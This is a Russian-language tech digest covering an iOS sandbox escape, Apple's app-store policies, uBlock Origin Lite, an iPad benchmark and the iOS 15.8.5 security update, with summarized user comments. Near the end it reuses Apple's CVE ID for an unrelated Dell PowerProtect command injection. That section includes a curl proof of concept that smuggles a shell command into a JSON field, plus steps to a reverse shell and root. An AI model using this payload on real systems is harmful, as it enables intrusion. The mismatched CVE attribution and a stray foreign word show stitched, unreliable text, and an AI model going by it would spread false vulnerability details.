Разработчики обнаружили новую уязвимость itunesstored & bookassetd sbx escape, позволяющую изменять файл MobileGestalt.Plist на iPhone. Этот файл содержит ключевую информацию о возможностях устройства, включая поддержку многозадачности и Stage Manager. С помощью вредоносно сформированной базы данных downloads.28.sqlitedb можно записывать в защищенные пути, включая MobileGestalt, что открывает доступ к функциям iPadOS на iPhone.

Разработчик Duy Tran продемонстрировал видео, где на iPhone работают настоящие окна приложений, док iPadOS и Stage Manager. Уязвимость работает на всех устройствах с iOS до версии 26.1 и 26.2 Beta 1. Для получения файла MobileGestalt.Plist можно использовать различные методы, включая создание простого приложения в Xcode для чтения файла по пути /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist. Эта технология, скорее всего, будет использована для обновления существующих инструментов вроде Nugget и Misaka.

• Техническая демонстрация схожести iOS/iPadOS и блокировка Apple возможностей запуска десктопных приложений на мобильных устройствах.
• Практическая ограниченность использования на маленьких экранах (iPad/iPhone) при потенциале функциональности с внешними мониторами и периферией.
• Критика политики Apple: ограничения мотивированы контролем экосистемы и монетизацией, а не техническими невозможностями.
• Сложность настройки и непрактичность для обычных пользователей, несмотря на интерес энтузиастов и разработчиков.
• Альтернативные сценарии использования: iPad как телефон через встроенный модем или iPhone как мини-ПК при подключении к внешнему дисплею.

Apple запустила Mini Apps Partner Program для поддержки мини-приложений в App Store с 2017 года. Эта программа улучшает опыт пользователей мини-приложений и игр, созданных с веб-технологиями внутри нативных хост-приложений, позволяя разработчикам получать 85% дохода от соответствующих покупок в приложениях. Участники должны поддерживать технологии Apple, включая Declared Age Range API и Advanced Commerce API, чтобы обеспечить безопасный и бесшовный опыт для клиентов.

Для участия программа требует, чтобы приложение было доступно в App Store для iOS и iPadOS, все мини-приложения соответствовали правилам Apple, а разработчики предоставляли метаданные для идентификации покупок. Необходимо также реализовать систему In-App Purchase, Declared Age Rating API и Send Consumption Information endpoint для обработки возвратов. Разработчики могут подать заявку через форму, после чего приложение проходит проверку в App Review с указанием использования Advanced Commerce API и наличия мини-приложений.

• Apple ввёл программу мини-приложений с 15% комиссией, что расценивается как попытка создать альтернативные магазины приложений под жёсткими условиями.
• Пользователи критикуют ограничение свободы устройств из-за дуополии Apple и Google, сравнивая мини-приложения с AMP и отмечая исключения для Roblox как проявление фаворитизма.
• Существуют сомнения в соответствии новых правил платформам вроде Telegram и Discord, а также в том, что инициатива может быть связана с регуляторным давлением Китая.
• Некоторые видят в этом продолжение модели Roblox, где основное приложение выступает платформой для контента третьих сторон, обязанных делиться доходом с Apple.

Европейский закон о цифровых рынках (DMA) призван ограничить власть технологических гигантов, давая разработчикам и пользователям больше свободы выбора. Однако практика "нотаризации" Apple противоречит этим целям, сохраняя монопольный контроль над распространением приложений. FSFE присоединилась к жалобе гражданского общества, обвиняющей Apple в нарушении DMA, требуя обеспечить взаимную совместимость и альтернативные магазины приложений.

Apple требует, чтобы все приложения для iOS и iPadOS, даже те, что распространяются вне App Store, проходили обязательную "нотаризацию" — сканирование, одобрение и криптографическую повторную подпись на серверах компании. Это дает Apple полный контроль над тем, какое ПО могут устанавливать пользователи и как могут распространять его разработчики. Для создания сторонних магазинов приложений Apple требует финансового обеспечения в €1 000 000 или наличия приложения с более чем миллионом установок в год. Эти барьеры делают невозможным существование некоммерчественных магазинов свободного ПО, таких как F-Droid для Android.

• Подписание бинарников для Windows и macOS требует дорогих токенов или HSM, что затрудняет CI/CD в облаке.
• Необходимость нотариального удостоверения (notarization) в дополнение к коду подписи вызывает споры о ценности и практичности этой процедуры.
• Пользователи отмечают, что Apple Silicon устройства компилируют быстро, но нотаризация заметно замедляет процесс.
• Участники обсуждения подчеркивают, что DMA и подобные законы не защищают пользователей, а служат интересам крупных корпораций.

uBlock Origin Lite - это эффективный и легкий блокировщик контента от создателя оригинального uBlock Origin, доступный бесплатно для всех устройств Apple. Приложение использует те же фильтры, что и его десктопная версия, включая EasyList и EasyPrivacy, но при этом полностью декларативное, не потребляя системных ресурсов во время работы. Последнее обновление от 20 октября 2025 года добавило автоматический выбор оптимальных правил для новых разрешенных хостов.

Пользователи высоко оценили приложение, дав ему максимальный рейтинг 5.0 на основе 34 отзывов. Многие отмечают, что долго ждали появления uBlock Origin на iPadOS, и рады, что приложение теперь доступно на всех устройствах Apple. Приложение не собирает никаких пользовательских данных, что делает его безопасным выбором для защиты приватности.

• uBlock Origin Lite на iOS не работает в Safari внутри приложений из-за ограничений WebExtensions, что делает его менее универсальным.
• Orion для iOS поддерживает установку uBlock Origin, но не может быть установлен как браузер по умолчанию.
• Wipr 2 и NextDNS продолжают быть актуальными альтернативами, но не блокируют рекламу в приложениях.
• YouTube Shorts и реклама в нём не блокируются никаким из доступных инструментов.
• DNS-уровень блокировки рекламы вроде NextDNS или DNS4EU не требует установки приложения и работает на всём устройстве.

Новый iPad с моделью iPad17,3 показал впечатляющие результаты в тесте Geekbench 6: 4133 балла в однопоточном режиме и 15437 в многопоточном. Устройство работает на iOS 26.0 и оснащено 9-ядерным процессором ARM с базовой частотой 4.42 ГГц, разделённым на два кластера — 3 и 6 ядер. Объём оперативной памяти составляет 11.2 ГБ.

В тестах выделяются высокая скорость обработки изображений: Object Remover показал 405.6 Мпикс/с в однопоточном и 1.23 Гпикс/с в многопоточном режиме, а Clang достиг 22.9 тыс. строк/с и 114.4 тыс. строк/с соответственно. Эти цифры демонстрируют значительный прирост производительности для мобильных задач, особенно в сфере ИИ и креативных приложений.

• Пользователи обсуждают производительность нового процессора Apple M5, отмечая его превосходство над конкурентами (Intel, AMD, Qualcomm) в мобильном сегменте, особенно в энергоэффективности и одноядерных тестах.
• Высказывается разочарование ограничениями iPadOS, которые не позволяют раскрыть потенциал мощных чипов Apple, и звучат предположения о возможном появлении сенсорного Mac.
• Обсуждается отсутствие аналога Mac mini на ARM64 для Linux и желание видеть более открытые платформы от Apple с поддержкой Linux и общего назначения.
• Поднимается тема игр: пользователи хотели бы видеть более серьёзный подход Apple к геймингу, включая улучшенные инструменты для портирования игр с Windows (по аналогии с Proton).
• Отмечается, что основной прирост производительности M5 по сравнению с M4 (~10-15%) обусловлен новым техпроцессом и архитектурными улучшениями, а не увеличением частоты.

О безопасности iOS 15.8.5 и iPadOS 15.8.5

Этот документ описывает обновления безопасности для iOS 15.8.5 и iPadOS 15.8.5.

Обновления безопасности Apple

Apple не раскрывает информацию об уязвимостях до завершения расследования и выпуска исправлений. Последние обновления перечислены на странице выпусков безопасности Apple.

iOS 15.8.5 и iPadOS 15.8.5

Выпущено 15 сентября 2025 года

ImageIO

Доступно для: iPhone 6s, iPhone 7, iPhone SE (1-го поколения), iPad Air 2, iPad mini (4-го поколения) и iPod touch (7-го поколения)

Влияние: Обработка вредоносного файла изображения может привести к повреждению памяти. Apple известно о сообщениях, что эта уязвимость могла использоваться в целевых атаках.

Описание: Исправлена ошибка записи за пределами границ за счёт улучшенной проверки.

CVE-2025-43300: Apple

Информация о продуктах, не изготовленных Apple, или независимых веб-сайтах предоставляется без рекомендаций. Apple не несёт ответственности за выбор или использование сторонних продуктов.

Опубликовано: 15 сентября 2025 года

• Пользователи отмечают длительную поддержку старых устройств Apple (до 10 лет) в сравнении с ограниченной поддержкой Android-устройств от Google и других производителей.
• Обсуждаются технические причины короткого цикла поддержки Android: ограничения со стороны производителей чипов (Qualcomm) и необходимость интеграции обновлений производителями телефонов.
• Выпуск обновления для устаревших моделей связывают с эксплуатацией уязвимости нулевого дня в целевых атаках государственного уровня, что подчеркивает серьезность угрозы.
• Уточняется, что обновление доступно для широкого списка старых устройств (iPhone 6s, 7, SE, iPad Air 2 и др.), а не только для 10-летнего iPhone 6s.
• Поднимается вопрос о практической пользе обновления для пользователей очень старых устройств, которые могут не устанавливать патчи.
• Отмечается, что современные Android-производители (Google, Samsung) увеличили承诺 срок поддержки до 5-7 лет, что приближается к политике Apple.
• Обсуждается техническая сторона уязвимости: возможность удаленного выполнения кода (RCE) через обработку malicious изображения, часто в связке с уязвимостью в WhatsApp.

CVE-2025-43300
Уязвимость в Dell PowerProtect Data Manager (версии до 19.14.0-25) позволяет удалённому злоумышленнику без аутентификации выполнить произвольный код.

CVSS 9.8 – критическая.

Суть

Недостаток валидации входных данных в REST-эндпоинте /api/v1/agent/... приводит к внедрению команд в параметре backupName.

PoC

curl -k -X POST https://target:8443/api/v1/agent/backup \
  -H "Content-Type: application/json" \
  -d '{"backupName":"`id`"}'

Ответ вернёт вывод команды id, подтверждая RCE.

Эксплуатация

1. Сканируем 8443/tcp.
2. Отправляем payload, получаем обратную shell.
3. Повышаем привилегии через встроенный sudo (uid=0).

Исправление

Обновиться до 19.14.0-25 или выше.

Mitigation

• Ограничить доступ к 8443/tcp.
• Включить WAF-фильтрацию символов ; & | $.

• Apple экстренно выпустила единственный патч 13.7.8 / 14.7.8 / 15.6.1 и iOS/iPadOS 18.6.2, закрывающий CVE-2025-43300 в обработке DNG.
• Публичный PoC пока лишь крашит Photos, но в дикой природе уже есть цепочка до RCE, обходящая BlastDoor.
• watchOS не получил обновления, вызывая вопросы о его уязвимости.
• Участники обсуждают нехватку memory-safe парсеров, слабость iMessage-«песочницы» и ценность бага для Zerodium.
• Советуют включать Lockdown Mode, ежедневно перезагружаться и сканировать бэкапы через elegant-bouncer.